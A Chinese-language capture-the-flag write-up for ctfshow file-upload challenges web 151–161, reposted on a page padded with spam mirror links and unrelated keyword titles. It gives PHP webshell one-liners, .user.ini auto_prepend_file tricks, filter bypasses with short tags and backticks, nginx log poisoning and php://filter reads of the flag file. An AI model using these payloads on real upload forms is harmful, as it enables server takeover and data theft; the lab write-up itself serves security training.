当前位置: 首页 > news >正文 宁波制作网站哪个好做电子商务平台网站 news 2025/10/30 0:42:02 宁波制作网站哪个好,做电子商务平台网站,做软件赚钱的网站,网站开发与管理课程设计心得文章目录 文件上传思路web 151web 152web 153知识点解题 web 154web 155web 156web 157web 158web 159web160web 161 文件上传思路 web 151 打开页面显示#xff1a;前台校验不可靠。说明这题是前端验证。 右键查看源代码#xff0c;找到与上传点有关的前端代码#xff1a… 文章目录 文件上传思路web 151web 152web 153知识点解题 web 154web 155web 156web 157web 158web 159web160web 161 文件上传思路 web 151 打开页面显示前台校验不可靠。说明这题是前端验证。 右键查看源代码找到与上传点有关的前端代码 这里使用了一个叫Layui的组件库url代表上传接口accept代表允许上传的文件类型exts代表允许上传的文件后缀。可见这里前端只允许上传图片类型的文件且文件后缀名为png。 绕过前端验证的最简单方法就是上传一个png的webshell再使用burp抓包更改文件后缀名再访问上传的webshell。 可见上传成功~下一步就是写一个shell?php eval($_POST[cmd]);?用webshell连接工具蚁剑去连接上传的webshell。 这里我们详细分析一句话木马不借助工具获取flag。 php代码要写在?php ?中php解析器才会认出这是php代码符号的意思是不报错即使执行错误也不报错eval()把字符串当做PHP代码执行$_POST[cmd]接收POST传参传参的变量名叫cmd。 除了POST传参还有GET传参$_GET[cmd]、全局的传参方法$_REQUEST[cmd]不管是GET传参 or POST传参 or FIlE传参 or COOKIE传参。 php执行系统命令的函数有system()、exec()、shell_exec()、反撇号。php执行外部命令 web 152 跟前一题一样的 web 153 知识点 自PHP 5.3.0起PHP支持基于每个目录的INI文件配置此类文件仅被CGI/Fast SAPI处理。如果PHP以模块化的方式运行在Apache里则.htaccess文件有同样效果。除了主php.ini之外php还会在每个目录下扫描INI文件从被执行的PHP文件所在目录开始一直上升到web根目录$_SERVER[‘DOCUMENT_ROOT’]所指定。如果被执行的php文件在web根目录之外则只扫描该目录。 配置选项是有权限的。php.ini是主要的配置文件.user.ini是用户自定义的配置文件且能覆盖php.ini的内容php解析器在解析php文件时会扫描.user.ini的配置。 在.user.ini风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。用人话说就是除了PHP_INI_SYSTEM模式的配置以外都可以在.user.ini中进行重写。两个重要的配置选项 auto_append_filefilename //相当于在每个php文件尾加上 include(“filename”) auto_prepend_filefilename //相当于文件头加上 include(“filename”)利用.user,ini的方法保证三个文件(.user.ini、shell.png、xx.php)在同一目录下再执行该目录下的php文件。例如 //.user.iniauto_prepend_file1.png//1.png?php phpinfo();?//1.php(任意php文件)三个文件在一个目录下就相当于1.php文件开头插入了include(1.png);进行文件包含因为1.png中有php代码所以经过include之后会执行shell脚本。 解题 此题前后端都检测content-type值只允许上传PNG文件。 上传.user.ini文件内容为auto_prepend_fileshell.png 上传shell.png文件 从之前可以得知upload文件夹下有一个index.php的文件故访问../upload/index.php?cmdphpinfo();可以看到phpinfo的页面。 web 154 知识点过滤?php 绕过方法使用短标签进行绕过没有限制条件。如 ?php eval($_GET[cmd]);? eval($_GET[cmd]);此题过滤了php这一关键词。使用短标签进行绕过。 pyload: ?eval($_GET[cmd]);?web 155 同web 154 web 156 知识点过滤php、[]关键字 绕过方法 php关键字被过滤使用php短标签进行绕过[]被过滤使用{}进行替换。例如?php eval($_GET[cmd]);? ?php eval($_GET{cmd});?payload ?system(cat ../fl*)?web 157 在前面的基础上过滤了{、;而且文件内容不能有php字符串。 绕过方法 过滤;则在短标签里可以省略;。例如 ?php eval($_GET{cmd});? ?php eval($_GET{cmd})?过滤{那就不用eval函数接受参数再执行系统命令直接用system()函数执行系统命令。如?system(ls)? -cat ../flag.phpcat ../fl* payload ?system(cat ../fl*)?web 158 同web157 web 159 在前面的基础上过滤了(。绕过方法直接用反撇号执行系统命令反撇号就相当于shell_exec()函数。payload ?cat ../fl*?web160 在前面的基础上过滤了反撇号。绕过方法 第一种方法利用日志包含绕过。就是说有些中间件会将用户访问记录记在日志里如果将webshell写到日志里再包含日志不就可以getshell了吗操作 同样先上传.user.ini文件内容为auto_prepend_fileshell.png 上传shell.png文件文件内容为?include/var/lo.g/nginx/access.lo.g?log关键词被过滤且将shell写在UA头中。 ngnix的日志路径为/var/log/nginx/access.logphp中可以用.进行字符串的拼接 访问xxx/upload/index.php. 第二种方法因为已经知道flag的位置通过php伪协议进行文件读取。 同样先上传.user.ini文件内容为auto_prepend_fileshell.png上传shell.png文件内容为?includeph.p://filter/covert.base64-encode/resource../flag.ph.p?访问xxx/upload/index.php再使用base64进行解码即可。 web 161 这关在前面的基础上还进行文件内容检测主要是使用getimagesize()函数进行检测服务端主要检测文件幻数。其实就是检测文件内容开始的地方不同后缀名的文件文件起始的地方是不一样的。 这关很恶心嗷前端验证只能为png文件后端检测文件内容必须是gif。 绕过方法制作图片马更简单的就是用burp抓包将你的shell写在文件内容里。 先上传.user.ini文件内容为auto_prepend_fileshell.png需要加gif文件的文件幻数GIF89a 上传shell.png文件内容为?includeph.p://filter/covert.base64-encode/resource../flag.ph.p?同样要加文件幻数GIF89a。 访问../upload/index.php使用base64进行解码。 文章转载自: http://www.morning.mhfbf.cn.gov.cn.mhfbf.cn http://www.morning.jfsbs.cn.gov.cn.jfsbs.cn http://www.morning.fylsz.cn.gov.cn.fylsz.cn http://www.morning.yrcxg.cn.gov.cn.yrcxg.cn http://www.morning.mkyny.cn.gov.cn.mkyny.cn http://www.morning.mwkwg.cn.gov.cn.mwkwg.cn http://www.morning.fpzz1.cn.gov.cn.fpzz1.cn http://www.morning.kjyfq.cn.gov.cn.kjyfq.cn http://www.morning.ljzss.cn.gov.cn.ljzss.cn http://www.morning.tfwg.cn.gov.cn.tfwg.cn http://www.morning.kgxrq.cn.gov.cn.kgxrq.cn http://www.morning.gblrn.cn.gov.cn.gblrn.cn http://www.morning.djpps.cn.gov.cn.djpps.cn http://www.morning.sqqdy.cn.gov.cn.sqqdy.cn http://www.morning.fosfox.com.gov.cn.fosfox.com http://www.morning.tygn.cn.gov.cn.tygn.cn http://www.morning.ngcsh.cn.gov.cn.ngcsh.cn http://www.morning.bfycr.cn.gov.cn.bfycr.cn http://www.morning.i-bins.com.gov.cn.i-bins.com http://www.morning.twpq.cn.gov.cn.twpq.cn http://www.morning.ldzss.cn.gov.cn.ldzss.cn http://www.morning.hcwjls.com.gov.cn.hcwjls.com http://www.morning.dqwykj.com.gov.cn.dqwykj.com http://www.morning.ybgt.cn.gov.cn.ybgt.cn http://www.morning.tnhg.cn.gov.cn.tnhg.cn http://www.morning.nmbbt.cn.gov.cn.nmbbt.cn http://www.morning.xcfmh.cn.gov.cn.xcfmh.cn http://www.morning.zsfooo.com.gov.cn.zsfooo.com http://www.morning.nwczt.cn.gov.cn.nwczt.cn http://www.morning.xmhpq.cn.gov.cn.xmhpq.cn http://www.morning.rnmmh.cn.gov.cn.rnmmh.cn http://www.morning.znmwb.cn.gov.cn.znmwb.cn http://www.morning.xqxrm.cn.gov.cn.xqxrm.cn http://www.morning.pqqhl.cn.gov.cn.pqqhl.cn http://www.morning.rbktw.cn.gov.cn.rbktw.cn http://www.morning.kjlia.com.gov.cn.kjlia.com http://www.morning.rkkh.cn.gov.cn.rkkh.cn http://www.morning.bdtpd.cn.gov.cn.bdtpd.cn http://www.morning.zcyxq.cn.gov.cn.zcyxq.cn http://www.morning.hyxwh.cn.gov.cn.hyxwh.cn http://www.morning.drytb.cn.gov.cn.drytb.cn http://www.morning.kdrjd.cn.gov.cn.kdrjd.cn http://www.morning.fygbq.cn.gov.cn.fygbq.cn http://www.morning.rjfr.cn.gov.cn.rjfr.cn http://www.morning.tmjhy.cn.gov.cn.tmjhy.cn http://www.morning.mqgqf.cn.gov.cn.mqgqf.cn http://www.morning.jkrrg.cn.gov.cn.jkrrg.cn http://www.morning.zwzlf.cn.gov.cn.zwzlf.cn http://www.morning.dpsgq.cn.gov.cn.dpsgq.cn http://www.morning.nwljj.cn.gov.cn.nwljj.cn http://www.morning.pqwhk.cn.gov.cn.pqwhk.cn http://www.morning.brtxg.cn.gov.cn.brtxg.cn http://www.morning.bhmnp.cn.gov.cn.bhmnp.cn http://www.morning.sbczr.cn.gov.cn.sbczr.cn http://www.morning.kxwsn.cn.gov.cn.kxwsn.cn http://www.morning.rszwc.cn.gov.cn.rszwc.cn http://www.morning.fgrkc.cn.gov.cn.fgrkc.cn http://www.morning.mftdq.cn.gov.cn.mftdq.cn http://www.morning.tpfny.cn.gov.cn.tpfny.cn http://www.morning.ksqzd.cn.gov.cn.ksqzd.cn http://www.morning.bgpb.cn.gov.cn.bgpb.cn http://www.morning.zhnpj.cn.gov.cn.zhnpj.cn http://www.morning.swkzk.cn.gov.cn.swkzk.cn http://www.morning.cftkz.cn.gov.cn.cftkz.cn http://www.morning.bslkt.cn.gov.cn.bslkt.cn http://www.morning.hhfqk.cn.gov.cn.hhfqk.cn http://www.morning.hmqmm.cn.gov.cn.hmqmm.cn http://www.morning.hzqjgas.com.gov.cn.hzqjgas.com http://www.morning.mxtjl.cn.gov.cn.mxtjl.cn http://www.morning.ltrms.cn.gov.cn.ltrms.cn http://www.morning.rnsjp.cn.gov.cn.rnsjp.cn http://www.morning.dxtxk.cn.gov.cn.dxtxk.cn http://www.morning.zknjy.cn.gov.cn.zknjy.cn http://www.morning.pqyms.cn.gov.cn.pqyms.cn http://www.morning.rsnn.cn.gov.cn.rsnn.cn http://www.morning.dansj.com.gov.cn.dansj.com http://www.morning.zrlwl.cn.gov.cn.zrlwl.cn http://www.morning.ktbjk.cn.gov.cn.ktbjk.cn http://www.morning.dfkmz.cn.gov.cn.dfkmz.cn http://www.morning.jydky.cn.gov.cn.jydky.cn 查看全文 http://www.tj-hxxt.cn/news/260929.html 相关文章: 贵安新区住房和城乡建设厅网站长沙第三方网站建设公司 php 网站 项目酒店管理专业建设规划 网站如何进行推广重庆安全监督工程信息网 建行官网官网网站吗河南企业网站排名优化 做网站用的编程语言做哪一类的网站可以短时间变现 外贸网站商城建设原型图怎么做网站交互 东莞网站建设服务商工程公司账务处理分录 cms适合做什么网站只做app不做网站可以吗 网站建设与管理实训主要内容国家免费24小时律师咨询 西柏坡门户网站建设规划书男人做想看的免费网站 如何把做的网站放到百度上搜索引擎算法 建设网站功能花垣网站建设 淄博网站关键字优化wordpress最快仿站 买服饰网站建设网站建设攻略 做产品网站需要注意pk10网站怎么做 对整个网站做词频分析深圳市住房和建设局网站-%3e认租申请 网站页面图片尺寸枣阳网站建设吧 汉中网站开发wordpress args 京伦科技做的网站如何免费拓客软件 网站设计 北京店深圳做网站哪家公司最好 苏州网站建设系统哪家好品牌建设的规划与实施 协会网站建设必要性wordpress php学习 物流网站建设规划书京山网站建设 江苏企业建网站排名优化马良行网站3d模型预览怎么做的 佛山做网站公司哪家好免费引流推广怎么做 湛江做网站从全国工商企业查询系统官网 北京网站优化策略新西兰网站后缀 呼和浩特企业网站排名优化自己网站建设多少钱 一个专门做特产的网站注册公司100万要交多少钱 做网站的主题有哪些网络推广预算方案
